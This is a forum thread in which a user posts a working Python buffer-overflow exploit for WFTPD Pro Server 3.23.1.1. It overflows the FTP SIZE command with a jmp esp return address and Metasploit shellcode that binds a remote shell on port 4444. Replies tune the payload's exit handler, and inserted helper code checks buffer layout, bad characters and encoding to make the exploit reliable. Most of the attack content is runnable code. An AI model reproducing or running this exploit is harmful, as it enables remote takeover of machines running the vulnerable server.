
Thread: wftpd DoS made exploit

  1. #1 reaperz (Just burned their ISO; Join Date: Jan 2010; Posts: 18)

    wftpd DoS made exploit

    I found a DoS attack for wftpd on milw0rm. I thought it would be fun to do a full-blown exploit out of it. Here is what I have done so far. It opens a bind shell on port 4444. It works great, but the only problem is that it crashes the wftpd server hard on shell disconnect. It was fun to do and could be better. Guess I like messing with outdated software. You have to start somewhere, right?
    I would like some help on a softer exit.

    Code:
    #!/usr/bin/env python3
    
    #####################################################################
    #  WFTPD Pro Server 3.23.1.1 Buffer Overflow use 7E429353 for xp sp3
    #  By: reaperz
    #  Original DoS attack found on milw0rm by: Joxean Koret
    #  Tested on XP SP3 for educational use only
    #####################################################################
    import sys
    import ftplib
    
    print("#################################################################")
    print("#  WFTPD Pro Server 3.23.1.1 Buffer Overflow use 7E429353 for xp sp3")
    print("#################################################################")
    
    target = "192.168.1.100"
    targetPort = 21
    
    # 0x7E429353 = jmp esp in user32.dll (XP SP3), written little-endian
    ret = '\x53\x93\x42\x7e'
    
    # Portbind shellcode from Metasploit; binds a shell to TCP port 4444
    sc = ("\xfc\xbb\xbe\xea\xa1\xd5\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"
    "\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x42\x02\x28\xd5\xba"
    "\xd3\x4b\x5f\x5f\xe2\x59\x3b\x14\x57\x6e\x4f\x78\x54\x05\x1d"
    "\x68\xef\x6b\x8a\x9f\x58\xc1\xec\xae\x59\xe7\x30\x7c\x99\x69"
    "\xcd\x7e\xce\x49\xec\xb1\x03\x8b\x29\xaf\xec\xd9\xe2\xa4\x5f"
    "\xce\x87\xf8\x63\xef\x47\x77\xdb\x97\xe2\x47\xa8\x2d\xec\x97"
    "\x01\x39\xa6\x0f\x29\x65\x17\x2e\xfe\x75\x6b\x79\x8b\x4e\x1f"
    "\x78\x5d\x9f\xe0\x4b\xa1\x4c\xdf\x64\x2c\x8c\x27\x42\xcf\xfb"
    "\x53\xb1\x72\xfc\xa7\xc8\xa8\x89\x35\x6a\x3a\x29\x9e\x8b\xef"
    "\xac\x55\x87\x44\xba\x32\x8b\x5b\x6f\x49\xb7\xd0\x8e\x9e\x3e"
    "\xa2\xb4\x3a\x1b\x70\xd4\x1b\xc1\xd7\xe9\x7c\xad\x88\x4f\xf6"
    "\x5f\xdc\xf6\x55\x37\x11\xc5\x65\xc7\x3d\x5e\x15\xf5\xe2\xf4"
    "\xb1\xb5\x6b\xd3\x46\xba\x41\xa3\xd9\x45\x6a\xd4\xf0\x81\x3e"
    "\x84\x6a\x20\x3f\x4f\x6b\xcd\xea\xc0\x3b\x61\x45\xa1\xeb\xc1"
    "\x35\x49\xe6\xce\x6a\x69\x09\x05\x1d\xad\xc7\x7e\x4d\x5a\x2a"
    "\x80\x63\xc6\xa3\x66\xe9\xe6\xe5\x31\x86\xc4\xd1\x8a\x31\x36"
    "\x30\xa7\xea\xa0\x0c\xae\x2d\xce\x8c\xe5\x1d\x63\x24\x6d\xd6"
    "\x6f\xf1\x8c\xe9\xa5\x51\xc7\xd1\x2e\x2b\xb9\x90\xcf\x2c\x90"
    "\x43\x73\xbe\x7e\x94\xfa\xa3\x29\xc3\xab\x12\x23\x81\x41\x0c"
    "\x9d\xb4\x9b\xc8\xe6\x7d\x40\x29\xe9\x7c\x05\x15\xcd\x6e\xd3"
    "\x96\x49\xdb\x8b\xc0\x07\xb5\x6d\xbb\xe9\x6f\x24\x10\xa3\xe7"
    "\xb1\x5a\x74\x7e\xbe\xb6\x03\x9e\x0f\x6f\x55\xa0\xa0\xe7\x51"
    "\xd9\xdc\x97\x9e\x30\x65\xb7\x7d\x91\x90\x50\xdb\x70\x19\x3d"
    "\xdc\xae\x5e\x38\x5e\x5b\x1f\xbf\x7e\x2e\x1a\xfb\x39\xc2\x56"
    "\x94\xaf\xe4\xc5\x95\xfa\xe5\xe9\x69\x04\xe6\xe9\x69")
    
    # Filler from the original milw0rm DoS: "\\A:" repeated 64 times (256 bytes)
    filler = "\\\\A:" * 64
    
    try:
        ftp = ftplib.FTP()
        # ftplib encodes str commands before sending; latin-1 maps every
        # character 0x00-0xff to that same byte, so the shellcode goes out intact
        ftp.encoding = "latin-1"
        print("[+] Connecting to target")
        msg = ftp.connect(target, targetPort)
        print("[+] Ok. Target banner")
        print(msg)
        print()
        print("[+] Trying to login anonymously")
        msg = ftp.login()
        print("[+] Ok. Message")
        print(msg)
        print()
    except ftplib.all_errors as exc:
        print("[!] BYE. " + str(exc))
        sys.exit(0)
    
    # 256 bytes of filler + 334 bytes of padding reach the saved return address;
    # jmp esp then lands in the NOP sled right in front of the shellcode
    buffer = filler + '\x41' * 334 + ret + '\x90' * 4 + sc + '\x90' * 200
    try:
        msg = ftp.sendcmd("SIZE " + buffer)
        print("[!] Exploit doesn't work [" + msg + "]")
    except ftplib.all_errors:
        # The server drops the control connection once the overflow fires
        print("[+] Exploit apparently works. Telnet to the host on port 4444")
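Before pointing a buffer like the one above at a target, two things are worth checking offline: that the layout numbers (256 bytes of filler, 334 bytes of padding, return address, NOP sled, shellcode) add up to the offsets seen in the debugger, and that nothing in the payload will be truncated or rewritten on its way through an FTP command line. The block below is an added example, not code from reaperz's post or from the milw0rm DoS. It rebuilds the same SIZE-argument layout with constructed stand-in shellcode bytes (the real payload is the one in the post), flags NUL, CR and LF bytes, and shows what a Python 3 ftplib exploit actually puts on the wire under latin-1 versus UTF-8 encoding. The function names build_buffer, layout, find_bad_chars, wire_bytes and check are my own.

```python
import struct

# Constructed stand-ins for the example; the real payload is the one in the post.
STAND_IN_SHELLCODE = b"\xfc\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75\xf7\xc3"
NUL_SHELLCODE = b"\xfc\xe8\x00\x00\x00\x00\x5e"   # an unencoded call/pop stub: contains NULs

JMP_ESP = 0x7E429353            # user32.dll, XP SP3, the address used in the post
FILLER = b"\\\\A:" * 64         # the milw0rm DoS trigger, 256 bytes
PAD_LEN = 334                   # 'A's between the filler and the saved return address
BAD_CHARS = b"\x00\x0a\x0d"     # NUL ends a C string; CR/LF terminate the FTP command line


def build_buffer(shellcode, ret_addr=JMP_ESP, sled_len=4, tail_len=200):
    """SIZE argument: filler + padding + little-endian ret + NOP sled + shellcode + trailing NOPs."""
    ret = struct.pack("<I", ret_addr)
    return FILLER + b"A" * PAD_LEN + ret + b"\x90" * sled_len + shellcode + b"\x90" * tail_len


def layout(shellcode, sled_len=4, tail_len=200):
    """Offsets of each region, to compare with what the debugger shows at the crash."""
    ret_off = len(FILLER) + PAD_LEN
    sled_off = ret_off + 4
    sc_off = sled_off + sled_len
    return {
        "ret_offset": ret_off,
        "sled_offset": sled_off,
        "shellcode_offset": sc_off,
        "total": sc_off + len(shellcode) + tail_len,
    }


def find_bad_chars(data, bad=BAD_CHARS):
    """(offset, byte) for every byte the FTP command path would truncate or mangle."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def wire_bytes(argument, encoding):
    """What ftplib.sendcmd('SIZE ' + argument) writes to the socket under a given FTP.encoding."""
    return ("SIZE " + argument + "\r\n").encode(encoding)


def check(shellcode, encoding="latin-1"):
    """Pre-flight: layout, bad characters, and whether the chosen encoding preserves every byte."""
    buf = build_buffer(shellcode)
    as_text = buf.decode("latin-1")          # how a str-based Python 3 exploit holds the buffer
    on_wire = wire_bytes(as_text, encoding)
    return {
        "layout": layout(shellcode),
        "bad_chars": find_bad_chars(buf),
        "bytes_preserved": on_wire == b"SIZE " + buf + b"\r\n",
    }


if __name__ == "__main__":
    for name, sc in (("clean stand-in", STAND_IN_SHELLCODE), ("stand-in with NULs", NUL_SHELLCODE)):
        print(name, check(sc))
    print("utf-8 preserves bytes:", check(STAND_IN_SHELLCODE, "utf-8")["bytes_preserved"])
```

With the 256-byte filler and 334 bytes of padding the return address sits at offset 590 and the shellcode starts at 598; the bad-character scan runs over the whole buffer, not just the shellcode, so the filler and the return address bytes are checked too. The encoding check is the reason a Python 3 port of this exploit has to set FTP.encoding to latin-1: under UTF-8 every byte above 0x7f becomes two bytes and the payload no longer lines up.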

  2. #2 Gitsnik (Very good friend of the forum; Join Date: Jan 2010; Location: The Crystal Wind; Posts: 851)

    What was your exit handler? SEH? Thread or process? (or whatever the options are)

    There are options available for the msfpayload command; have a look through MSFU on the offsec site if you need to.

    I like to play with all three handlers if I am not sure which to use, but normally it's a thread exit for me.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3 reaperz (Just burned their ISO; Join Date: Jan 2010; Posts: 18)

    Quote Originally Posted by Gitsnik
    What was your exit handler? SEH? Thread or process? (or whatever the options are)

    There are options available for the msfpayload command; have a look through MSFU on the offsec site if you need to.

    I like to play with all three handlers if I am not sure which to use, but normally it's a thread exit for me.
    So try each of these (SEH, Thread or process ) until I get a smooth exit?
    Thanks for the reply.

  4. #4 Gitsnik (Very good friend of the forum; Join Date: Jan 2010; Location: The Crystal Wind; Posts: 851)

    Quote Originally Posted by reaperz
    So try each of these (SEH, Thread or process) until I get a smooth exit?
    Thanks for the reply.
    Some exits may be smoother than others (a lock rather than a crash for example, though that's less clean). It is often dependent on the machine. That said, if the system crashes (one assumes you've migrated your meterpreter or gotten access elsewhere) at least you can just restart it with a shell.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
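The exit handler Gitsnik is asking about is the EXITFUNC option of the Metasploit payload (values seh, thread, process, or none): it selects what the shellcode calls once the shell disconnects. The hard crash on disconnect that reaperz sees is what a process exit looks like from the outside, while a thread exit ends only the hijacked connection thread and can leave the listener running. The block below is an added example, not code from the thread or from Metasploit, and it runs on the local machine rather than on Windows: it models the difference with a stand-in "server" process whose connection thread ends the way each EXITFUNC choice would (os._exit standing in for ExitProcess, SystemExit standing in for ExitThread), then reports whether the server outlived the payload. The seh exit is not modelled. The names payload_exit, server_main and server_survives are my own.

```python
import multiprocessing
import os
import sys
import threading


def payload_exit(mode):
    """What the shellcode does once its shell disconnects, per EXITFUNC choice.
    Modelled with Python equivalents: os._exit ~ ExitProcess, SystemExit ~ ExitThread."""
    if mode == "process":
        os._exit(3)        # the whole server process dies; nothing after this runs
    if mode == "thread":
        sys.exit(0)        # SystemExit raised in a thread ends only that thread
    raise ValueError("unknown exit mode: " + mode)   # 'seh' is not modelled here


def server_main(mode):
    """Stand-in for the FTP server: the thread handling the attacker's connection
    is the one whose stack the overflow took over, so the payload exits from it."""
    hijacked = threading.Thread(target=payload_exit, args=(mode,))
    hijacked.start()
    hijacked.join()
    # Reached only if the payload's exit left the process alive; this is where the
    # next client would be accepted. Exit status 0 tells the parent "still serving".
    sys.exit(0)


def server_survives(mode, timeout=10):
    """Run the stand-in server in a child process and report whether it outlived the
    payload's exit: True = still serving afterwards, False = it went down with the shell."""
    child = multiprocessing.Process(target=server_main, args=(mode,))
    child.start()
    child.join(timeout)
    if child.is_alive():           # hung rather than exited: treat as not surviving
        child.kill()
        child.join()
        return False
    return child.exitcode == 0


if __name__ == "__main__":
    for mode in ("thread", "process"):
        print("EXITFUNC=%s -> server survives: %s" % (mode, server_survives(mode)))
```

The model makes the trade-off visible: a thread exit only works cleanly when the server really does give each connection its own thread and the hijacked thread's stack is the only thing the overflow corrupted; if the overflow also trampled heap structures or a shared lock, the process may hang or crash later regardless of which exit is chosen, which is the "lock rather than a crash" case Gitsnik mentions.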
